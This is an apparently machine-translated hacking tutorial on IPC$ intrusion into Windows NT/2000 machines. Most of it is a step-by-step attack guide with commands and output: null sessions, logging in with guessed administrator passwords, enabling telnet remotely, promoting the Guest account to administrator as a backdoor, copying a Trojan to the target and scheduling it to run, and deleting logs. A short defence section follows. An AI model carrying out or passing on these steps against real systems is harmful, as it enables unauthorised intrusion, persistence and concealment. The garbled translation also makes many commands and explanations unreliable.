The article about IPC $ invading can be described as cow, and there is no shortage, and the attack step can even say that it has become a classic model, so no one is willing to take this into set out. But though said, but I personally think that these articles are not detailed. For the first time you have exposed to IPC $, you can't answer their confused. (You just find a HACK forum to search. IPC $, see how much the existence is. So I refer to some information, tutorials and forum posts on the Internet, write this summary of the nature, I want to make some easier confusion, easy to confuse the question, let everyone don't always be in the same place! Note: Discussion this article All of the circumstances occur by default, Win98 will not be discussed this discussion, and since the Win XP has improved in security settings, individual operations are not applicable. Article navigation: 1: What is IPC $ 2: Airpensow can be done 3: IPC $ The port used in IPC $ Connection in the HACK attack 5: IPC $ Connection Failure FAQ 6: Copy file failed Cause 7: How to open the target IPC $ sharing 8: The relevant command that may be used in the invasion 9: The relevant command that may be used in the invasion (2) 10: IPC $ Full Intrusion Steps Xiangxin 11: IPC $ Full Invasion Steps Xiang (2) 12: How to prevent IPC $ invading 13: IPC $ Intrusion Q & A feature 14: IPC $ Intrusion Questions and Aquity (2) 15: IPC $ Intrusion Questions and Answers (3) One, what is IPC $ IPC $ (Internet Process Connection) is a resource shared "named pipe", which is a named pipe that opens inter-process communication, by providing trusted username and password, connecting the two sides to establish a secure channel and encrypt in this channel. Data exchange, thereby implementing access to remote computers. IPC $ is a new feature of NT / 2000, which has a feature that only one connection is allowed between two IPs within the same time. NT / 2000 also opens the default sharing while providing IPC $ feature, all logical sharing (C $, D $, E $ ...) and system catalog Winnt or Windows (admin $) shared. All of these,
Microsoft
The original intention is to facilitate the management of administrators, but in interested, there is no intention to reduce system security. Usually we can always hear someone saying IPC $ vulnerability, IPC $ vulnerability, in fact IPC $ is not a true vulnerability, I think someone says this, must refer to
Microsoft
The 'back door': empty space (NULL session) is placed. So what is empty conversation? Second, what is an empty session before introducing an empty session, we need to understand how a security conference is established. In Windows NT 4.0, the Challenge Response Agreement is used to establish a session with the remote machine. The establishment of a successful session will become a secure tunnel, establishing the two parties through it through it, the process of the process is as follows: 1) Session requestor (customer) Transfer a packet to the session receiver (server), requesting a secure tunnel to establish an establishment; 2) The server generates a random 64-bit number (implementation challenge) transfer back to customers; 3) The customer gets the 64-bit number generated by the server. Using the password that tries to establish a session, return the results to the server (implement response); 4) After the server accepts the response to the local security verification (LSA), the LSA is verified by using the user's correct password to verify Confirm the requester identity. If the requester's account is the local account of the server, verify local; if the requested account is a domain account, the response is transmitted to the domain controller to verify. When the response to the challenge is verified correctly, an access token is generated, and then transmitted to the customer. Customers use this access token to connect to resources on the server until the suggested session is terminated. The above is a rough process established by a security conference. What is the empty session? The empty board is a session established with the server without trust (ie, the user name and password is not provided), but according to the Win2000 access control model, the establishment of the empty space will also provide a token, but the empty session is in the process of establishing There is no authentication of user information, so this token does not contain user information, so this session does not allow the system to send encrypted information, but this does not mean that there is no security identifier SID in the token of the empty session (it identifies User and locale), for an empty box, the SID of the token provided by the LSA is S-1-5-7, this is the SID of the empty session, the username is: Anonymous Logon (this username is available in the user list As seen in the SAM database, it is not found in the SAM database), this access token contains the following group: Everyone Network will be authorized to access the above two in the security policy limiter, this empty session will be authorized to access the above two The group has the right to access all information. So what can I do if I build an empty session? Third, the empty space can do what to NT, with the default security settings, can list the users and shares on the target host, access the share of Everyone privilege, access small partial registry, etc., there is no great use value The 2000 role is smaller, because in Windows 2000 and later, only administrators and backup operators have the right to access the registry from the network, and it is not convenient to achieve tools. From these we can see that this kind of non-credit session does not use, but from a complete IPC $ invading, empty space is an indispensable springboard because we can get a list from it, this is An older hacker is already enough.
The following is the specific command that can be used in the empty session: 1 First, let's create an empty box (IPC $) command: NET USE // IP / IPC $ "" / user: "Note: The above command includes Four spaces, NET and USE have a space in the middle of the USE, one after the user, the password is around one space. 2 View the shared resource command of the remote host: Net View // IP Interpretation: After establishing an empty connection, you can view this command to view the shared resource of the remote host. If it has a sharing, you can get the following similar results: on // * Shared resource resource resource shared name type Totto --------------------------------- ------------------------ Netlogon Disk Logon Server Share Sysvol Disk logon server share command successfully completed. 3 View the current time command of the remote host: NET Time // IP Interpretation: Use this command to get a remote host's current time. 4 Get the NetBIOS username list (need to open your own NBT) nbtstat -a ip with this command to get a NetBIOS username list (require your NetBIOS support), return to the following results: Node ipaddress: [* SCOPE ID: [] Netbios Remote Machine Name Table Name Type Status -------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------- Server <00> Unique registered oyamanishi-h <00> Group registered oyamanishi-h <1c> Group register Server <20> Unique Registered Oyamanishi-h <1b> unique Registered OYAMANISHI-H <1E> GROUP Registered SERVER <03> UNIQUE Registered OYAMANISHI-H <1D> UNIQUE Registered ..__ MSBROWSE __. <01> GROUP Registered INet ~ Services <1C> GROUP Registered IS ~ SERVER ...... < 00> Unique registered mac address = 00-50-8b-9A-2D-37 is what we often use empty session, it seems to have a lot of things, but you should pay attention to a point: establish an IPC $ connection Leave a record in EventLog, whether you are successful.
Ok, then let's take a look at the ports used by IPC $? Fourth, the port used by IPC $ first let us know some basic knowledge: 1 SMB: (Server Message Block) Windows protocol, for file printing sharing services; 2 NBT: (NetBIOS over TCP / IP) Use 137 (UDP 138 (UDP) 139 (TCP) port implementation of NetBIOS network interconnection based on TCP / IP protocol. 3 In WindowsNT, SMB is implemented based on NBT, and in Windows 2000, SMB can be implemented directly through a 445 port in addition to NBT implementation. With these basic knowledge, we can further discuss access to the network sharing to the port: For the Win2000 client: 1 If the server is allowed to connect the server, the client will try to access 139 and 445 port at the same time. If the 445 port has a response, then send the RST package to the 139 port disconnect, perform a session with a 455 port, only 139 ports are used when the 445 port does not respond, if the two ports do not respond, then the session failed; 2 If the server is connected to the server in the case of NBT, then the client will only try to access 445 ports, if the 445 port is no response, then the session fails. It can be seen that the Win 2000 after the NBT is banned will fail. For the Win2000 server side: 1 If NBT is allowed, the UDP port 137, 138, TCP ports 139, 445 will be open; 2 If NBT is prohibited, only 445 port is open. Our established IPC $ session is equally complied with the above principles. Obviously, if the remote server does not listen to 139 or 445 port, IPC $ session cannot be created. 5. The meaning of IPC $ connected in the HACK attack is just like it is said above, even if you have an empty connection, you can also get a lot of information (and this information is often an essential invasion), if You can log in as a user with certain permissions, then you will get the appropriate permissions, obviously if you log in as an administrator, hey, you can't do it, you can do it for what you want. But you don't want to be too early, because the administrator's password is not so good, although there will be some careful administrators have a weak pass, but this is a few, and now it is not previously, with people's safety awareness Increased, the administrators also be more careful, get the administrator's password will be more difficult, so your biggest possibility is to connect with minimal permissions or even no permissions, and even do not open IPC $ sharing in the host. When you can't connect, you will slowly discover IPC $ connection is not universal, so don't expect each connection to succeed, it is unrealistic.
Is it some discouraged? It is also not, the key is that we have to appear mentality, don't treat IPC $ invading as an ultimate weapon, don't think it's a battle, it is just a kind of intrusion method, you may use it to kill, and there are Maybe it is nothing, these are normal, in the world of hackers, not every road to lead to Rome, but there is always a road to travel to Rome, patient look! Six IPC $ Connection Failure The following is a common reason for the failure of IPC $ Connection: 1 IPC connection is a unique feature in Windows NT and above, because it needs to use a lot of DLL functions in Windows NT, so you can't Run in the Windows 9.x / ME system, that is, only NT / 2000 / XP can establish IPC $ connected to each other, 98 / ME does not establish IPC $ connection; 2 If you want to successfully create an IPC $ connection, It is necessary to open IPC $ sharing, even if the empty connection is true, if the other party closes the IPC $ sharing, you will build a failure; 3 You have not launched the LanmanWorkStation service, it provides network link and communication, no you can't initiate a connection request (Display: Workstation); 4 Panel does not start the LANMANServer service, provides RPC support, file, print, and named pipe sharing, IPC $ relies on this service, without its remote host will not respond to your connection request (display name) For: Server; 5 other party did not start Netlogon, it supported the computer pass-through account login in the network; 6 other parties banned NBT (ie open 139 port); 7 other firewalls shielded 139 and 445 ports; 8 Your users Name or password error (obvious empty session excludes such an error); 9 command input error: maybe more spaces, when the username and password do not include the double quotes on both sides can be omitted, if the password is empty, you can Enter two quotation marks "", "10 If the other party restarts the computer in the case where the connection has been established, the IPC $ connection will be automatically disconnected and the connection is required.
In addition, you can also analyze the reason according to the returned error number: Error number 5, refuse to access: It is likely that the users you use are not administrator privileges, first improve the permissions; the error number 51, Windows cannot find the network path: network has problems; Error number 53, no network path: IP address error; the target is not boot; the target LanmanServer service is not started; the target has a firewall (port filtering); error number 67, find the network name: Your LanmanWorkStation service is not started or target Deleted IPC $; error number 1219, provided credentials and existing credentials set: You have established an IPC $ with each other, please delete again; error number 1326, unknown user name or error password: reason is obvious ; Error number 1792, trying to log in, but the network login service is not started: the target NetLogon service is not started; the error number 2242, this user's password has expired: the target has an account policy, enforces the regular requirements to change the password. The reason for the failure of the seven copy file Some friends have successfully established IPC $ connected, but when Copy has encountered such trouble, can't copy success, then what is the common cause of replication failure? 1 Blind copying This type of error occurs most, accounting for more than 50%. Many friends don't even know if the other party has a shared folder, which is blindly replicated, and the result is a very depressed and depressed. So I suggested that you must use the NET View // ip command before conducting a copy, don't think that IPC $ connection has been successfully established, you must have a shared folder. 2 Default Sharing Judgment Errors This type of error is also often crossed, mainly two small aspects: 1) Error thinking can establish an IPC $ connected to the host, will open the default sharing, so after the connection is completed, you immediately go to Admin. The default sharing replication file, which causes the copy to fail. IPC $ Connection Success You can only explain the other party to open IPC $ sharing, IPC $ sharing and default sharing are two yards, IPC $ sharing is a naming pipe, not which actual folder, and default sharing is not the necessary condition for IPC $ ; 2) Since Net View // IP cannot display the default share (because the default shared belt $), we cannot judge whether the other party opens the default share, so if the other party does not turn on the default sharing, then all to the default sharing The operation is not successful; (but most scanning software can sweep to the default shared directory while sweeping the password, avoiding the occurrence of such errors) 3 User privileges are not enough, including four scenarios: 1) Empty connection When copying all shares (default sharing and normal sharing), most cases are not enough; 2) When copying to the default, you must have administrator privileges; 3) When copying to normal, you have to have appropriate permissions (ie each other Prior to set access); 4) The other party can ban external access sharing through the firewall or security software; it also needs to be explained: Don't think that administrator is an administrator, the administrator name can be changed.
4 Kill the firewall or in the local area network may have successful, but when the remote is running, it is killed by the firewall, causing the file to find the file; also possible you to copy the Trojan to the host in the LAN, causing the connection failure . Therefore, it is recommended that you have to copy it, otherwise you will give up. Oh, everyone also knows that IPC $ connects in the actual operation process, there will be a thousand problems. The above summarizes is just some common mistakes. I haven't mentioned it, I can only let everyone know. Eight how to open the target's IPC $ sharing and other shared targets IPC $ not easy to open, otherwise it will be disrupted in the world. You need a shell of admin privilege, such as Telnet, Trojan, etc., then execute NET Share IPC $ to open the target's IPC $, with NET Share IPC $ / DEL to close the sharing. If you want to open a shared folder, you can use Net Share Baby = C: /, this will open its C on the shared name. Nine Some commands that need shell can do to see that many tutorials are very incorrect. Some need shells can complete the command, which is a simpler, and play a misleading. Then I summarize the command that needs to be done in Shell: 1 Establish the user, activate the user, modify the user password, and add the operation of the management group to be completed under the shell; 2 Turn on the remote host IPC $ sharing, default sharing, Ordinary shared operations need to be completed under the shell; 3 Run / close the service of the remote host, need to be completed under the shell; 4 Start / kill the process of the remote host, you need to do it under the shell. The relevant command that may be used in the 10 invasion Please note that the command can be used for local or remote. If applicable to the local, you can only perform it to the remote host after obtaining the shell of the remote host.
1 Create an empty connection: NET USE // IP / IPC $ "" / user: "2 Create a non-empty connection: NET USE // IP / IPC $" PSW "/ user:" Account "3 View remote host shared resources (But I don't see default sharing) NET View // IP 4 View local host shared resources (you can see Local default sharing) NET Share 5 Get user name list NBTSTAT -A IP 6 get a list of user lists from local hosts NET User 7 View Remote Host Net Time // IP 8 Display Local Host Current Services NET Start 9 Start / Off Local Service NET Start Service Name / Y Net STOP Service Name / Y 10 Mapping Remote Sharing: Net Use Z: / / Ip / baby This command maps shared resource named Baby to z-disk 11 Delete Sharing Map NET USE C: / DEL Delete Mapping C Dish, other disk classes to push NET USE * / del / y Delete all 12 to remote host Copy file COPY / Path /SRV.exe // ip / shared directory name, such as: copy ccbirds.exe //*.*.*.*C to copy files under the current directory to the other C drive 13 remote add plan Task AT // IP Time Program Name, such as: AT //127.0.0.0 11:00 Love.exe Note: Time to use 24 small system; do not need to be added with the system default search path (such as system32 /), otherwise you must add All Path 14 Totel Telnet with Remote Hosts To use a small program: Opentelnet.exe, all major download sites are available, but also need to meet four requirements: 1) Target open IPC $ sharing 2) You have an administrator Password and account 3) Target Open RemoteRegistry service, users are valid for Win2K / XP, NT untested command format: opentelnet.exe // Server Account PSW NTLM authentication Port Examples are as follows: C: /> Opentelnet.exe //*.*.*.* Administrator "" 1 90 15 Activate users / joined administrators group 1 NET UES R Account / Active: YES 2 NET localGroup Administrators Account / Add 16 Tighted Telnet with remote hosts also requires a small program: ResumeTelnet.exe command format: ResumeTelNet.exe // Server Account PSW Examples are as follows: C: /> ResumeTelnet.exe //*.*.*.*Istrator "" Delete a established IPC $ connected NET USE // IP / IPC $ / DEL Eleven IPC $ Full Intrusion Steps Xiangxun Inactive Invasion Steps Different, I just said that it is common, huh, huh, deceive! 1 Search with the scanning software, the host, such as streamer, SSS, X-scan, etc., follow you, then lock the target, if you sweep the password of the administrator privilege, you can make the following steps,
Suppose you get the password of Administrator is empty 2 At this point you have two ways to choose: Either open the telnet (command line), or give it a trembie (graphical interface), then let's take the road this road first. Let's open the telnet's command to use it. If you want to use the Opentelnet, this applet c: /> opentelnet.exe ///192.168.21.********************* ******************************************* Remote Telnet Configure, BY REFDOM EMAIL: REFDOM EMAIL: REFDOM@263.net opentelnet.exe usage: opentelnet.exe // server username password ntlmauthor telnetport ***************************************** ******************************************************************** Connecting //192.168.21.*...successfully! Notice !!!!!!! Telnet Service default setting: NTLMAuthor = 2 TelnetPort = 23 Starting telnet service ... telnet service is started successfully telnet service is running BINGLE !!! Yeah !! Telnet Port is 90. You can try:!! "telnet ip 90", To Connect The Server! Disconnecting Server ... SuccessFully! * Description You have already opened a Telnet of a port 90. 4 Now we telnet on telnet 192.168.21. * 90 If success, you will get a shell of the remote host. At this point you can control your broiler like your machine, do you do something? To activate the Guest to join the management group, even if you leave a latter 5 c: Yes * activate the guest user, and possibly people's guests are trying to live, you can use Net user guest. The value enabled by its account is YES or no 6 c: /> net user guest 1234 * change the Guest's password to 1234, or change your favorite password 7 c: /> net localgroup administrators guest / add * will guest Changed to Administrator, so that even after the administrator changed his password, we can also log in with Guest, but also remind you, because through security policy settings, you can prohibit remote access such as Guest and other accounts, huh, if it is true. In this way, then our back door is also white, and God will bless Guest.
8 Ok, now let's take another road, give it a Trojan play 9 First, we first build an IPC $ Connection C: /> NET Use //192.168.21.*/ipc $ "" / user: Administrator 10 Since you want to upload something, you must first know what it will share C: /> Net View //192.168.21.* in //192.168.21. * Shared resource resource shared name Type Note ---- -------------------------------------------------- ----- c Disk d Disk command successfully completed. * Ok, we see the other party share C, D two disks, we can copy files from any disk. Award again, because the default sharing cannot be seen with the NET View command, so we cannot judge whether the other party opens the default sharing. 11 C: /> Copy Love.exe //192.168.21.* Cable 1 file * Use this command You can pass the Trojan client love.exe to the other party's C disk, of course, if you can copy it The system folder is the best, it is not easy to find 12 running the Trojan, let's take a look at it now Net Time ///192.168.21.* The current time is 2003/8 / 22 AM 11:00 The order is successfully completed 13 Now we run it with AT, but the other party must open the Task Scheduler service (allowing the program to run in the specified time), otherwise it will not work C: /> AT //192.168.21 * 11:02 C: /love.exe added a job, his job ID = 1 14 is waiting, wait 11:02, you can use the control terminal to connect, if you succeed you It will be able to control the remote host with a graphical interface. If the connection fails, it may be in the local area network, or the program may be killed by the firewall, and it may be offline (not so smart), no matter what case, you have to give up Well, well, two basic methods said. If you have a light car, you can use a more efficient routine, such as using CA clone guest, perform Trojan with psexec, use the command: psexec // tergetip -u user -p paswd cmd.exe directly gain Shell, etc., These are all available, with you. But don't forget to clean your logs, you can use the Elsave.exe of the Gongge. Telling the invasion of IPC $, you can't say how to prevent it, how do you do it? Look at the twelve below to prevent IPC $ intrusion 1 Prohibiting empty connection to enumerate (this operation does not block the establishment of empty connections) Method 1: Run Regedit, find the following primary key [hkey_local_machine / system / currentcontrolset / control / lsa] put restrictanonymous = DWORD key value is changed to: 1 If set to "1", an anonymous user can still connect to IPC $ sharing, but limit information such as SAM account and sharing by this connection; in Windows 2000, "2" To limit all anonymous access unless otherwise licensed, if set to 2, there may be some other problems, and it is recommended to set it to 1.
If the primary key mentioned above does not exist, create a new key value. Method 2: Local Security Settings - Local Policy - Security Options - Doing the Cormancy Connection 2 for Anonymous Connection 2 Prohibiting Default Sharing 1) Local Shared Resource Run-CMD- Enter Net Share 2) Delete Sharing (Heavy The default sharing still exists) NET Share IPC $ / Delete Net Share Admin $ / Delete Net Share C $ / Delete Net Share D $ / Delete (if there is e, f, ... can continue to delete) 3) Stop Server service NET STOP Server / Y (Restarting the Server service will be reopened) 4) Prohibiting automatic open default sharing (this action does not close the IPC $ shared) Run -Regedit Server version: Find the following primary key [HKEY_LOCAL_MACHINE / SYSTEM / CURRENTCONTROLSET / SERVICES / LANMANSERVER / Parameters] Change the key value of AutoShareserver (DWORD) to: 00000000. Pro version: Find the following primary key [HKEY_LOCAL_MACHINE / SYSTEM / CURRENTCONTROLSET / SERVICES / LANMANSERVER / Parameters] change the key value of AutoShaRewks (DWORD) to: 00000000. If the primary key mentioned above does not exist, you will be built (right-click-new-double-byte value) a primary and re-change key value. These two key values are not exist in the host by default, and they need to be added manually. 3 Turn off IPC $ and default shared services: Server Service Control Panel - Administrative Tools - Services - Find Server Services (Right-click) - Properties - General - Start Type - Selection is disabled At this time, there may be prompt: XXX service Will it turn off Whether to continue, because there are still some secondary services to rely on LanmanServer, do not manage it. 4 Shield 139,445 Port Since there is no support for the above two ports, it is impossible to establish IPC $, so the shield 139, 445 port can also prevent IPC $ invading. 1) 139 ports can be shielded locally by disabling NBT - TCP / IT attributes - Advanced -Wins- Select 'Disable TCP / IT NetBIOS' One 2) 445 Port You can block the Add a key value by modifying the registry. : HKEY_LOCAL_MACHINE: System / ControlSet / Services / Netbt / Parameters Name: SMBDeviceEnable: 0 Modified After the machine is restarted: If the above two ports are blocked, you will not be able to invade others with IPC $. 3) Install the firewall for port filtering 5 to set the complex password to prevent passwords via IPC $ exhaust. Thirteen IPC $ Intrusion Q & A Collection Theory I said a lot of theory, but in practice, you will encounter a variety of questions, so in order to give everyone the greatest help, I will see several security forums, find it. N more posts, I have organized some representative question and answer, some of which are what I gave, some are the reply on the forum, if there is any omission and wrong, please bear it.
1. When IPC $ invading, you will leave a record in the server. Is there any way not to let the server find it? A: Leave a record is sure, you can use the program to delete it, or invade with broilers. 2. You look at the situation below, you can connect but you can't copy net use //**/iPC $ "Password" / user: "User Name" command successful Copy Icmd.exe //*** .***.***.***/admin $ Cannot find the network path command is unsuccessful answer: Two reasons: 1) Your permissions are not enough, you can't access the default sharing 2) The other party does not open admin $ default sharing, don't think IPC $ connection, the other party will open the default sharing (many people think that, misunderstanding !!), at this time you can try other default sharing or ordinary Sharing, such as C $, D $, C, D, etc., if you still can't, you have to look at your permissions. If you are administrator privileges, you can open telnet, if you can succeed, you will have a sharing. 3. If the other party has opened IPC $, and can establish an air joint, but when the C, D disk is opened, you will ask the password, I know that there is not much permission, but nothing else? A: It is recommended to guess the password with a stream or other, if you can't guess, you can only give up, after all, the ability to get a limited capacity. 4. I have already guess the administrator's password, and I have already been successfully connected, but net view // ip found that it did not open the default sharing, what should I do? A: First correct your error, use Net View, you can't see the default sharing. Since you have administrator privileges now, and the other party has opened IPC $, it is recommended that you open its Telent with opentelnet.exe. After getting this shell, you can do anything. 5. After the connection is successful, I use the following command to establish an account, but I found this account on my own machine. What is going on? NET USET CCBIRDS / ADD ADD ADD A: IPC $ Establishment Success You can only show that you have established a communication tunnel with the remote host, do not mean a shell, only after getting a shell, you can create an account remotely, otherwise you The operation is only done locally. 6. I have entered a meat machine, the administrator account, can be used to see his system time, but the copy program is not on his machine, each time it prompts "refusal to access, copy 0 files", Is it that the other party has any service? What should I do? A: You can't have a copy file. In addition to the permissions, it is possible to be the other party C $, D $ and other default management shares, or the other party is NTFS file format. By setting, administrator may not be able to write a file remotely . Since you have administrator privileges, let's go on Telnet and then open it.
7. Can I use Win98 to establish IPC $ connected to the other party? Answer: It is not possible, to perform IPC $ operation, it is recommended to use Win2000 8. I use Net USE // IP / IPC $ "/ user" to successfully establish an empty space, but use nbtstat -a ip can't Export a list of users, why? A: The empty boxing can export the user list by default, but if the administrator disables the export list by modifying the registry, you will have what you said; or your own NBT is not open, NetStat is built Above NBT 9. I returned the following information when I establish IPC $ Connection: 'Provision of credentials conflict with existing credentials', what is going on? A: Oh, this shows that you have established more than more than one IPC $ with the target host, which is not allowed, deleted other deletions: Net use //*.*.. I appear when mapping: f: /> net use h: ///211.161.134.*/E $ 85 error occurred. The local device name is already in use. How is this going? A: You are too careless, this shows that your H disk is being used, mapped to other disks! 11. I built a connection f: /> net use //*.*.*. "123" / user: "ccbirds" successful, but when I mapping, I have to password ,what happened? F: /> Net Use H: //*.*.* (() Password in //*.*.*.*/C $ Invalid. Type //*.*.*! () Password: The system has a 5 error. access denied. A: Oh, huh, you want a password to indicate that your current user permissions are not enough, can't map C $ this default share, find way to improve permission or find the administrator's weak mouth! The default sharing is generally required for administrator privileges. 12. I swept it with SuperScan to a host opened 139 port, but why can't I get it? A: You confuse the relationship between IPC $ and 139, the host that can be connected to the IPC $ will soon open 139 or 445 port, but the host that opens the two ports may not be empty, because the other party can turn off IPC $ sharing. 13 Most of the machines in our domain networks are XP. I use a stream scan to several Administrator account passwords to be empty, but can be connected, but they cannot copy things, saying errors 5. Why? A: XP is high, and in the default setting of the security policy, when authentication of the local account, the default is a guest authority, even if you log in remotely with the administrator, there is only guest rights, so You copy the file, of course, is wrong 5: The permissions are not enough. 14. I used Net Use //192.168.0.2/IPC $ "Password" / user: "administrator" successfully, but NET use i: //192.168.0.2/C, please type //192.168.0.2 password, how to return What about things? A: Although you have administrator privileges, the administrator may not set up to allow administrator access when setting the C disk shared level, so there is a problem.
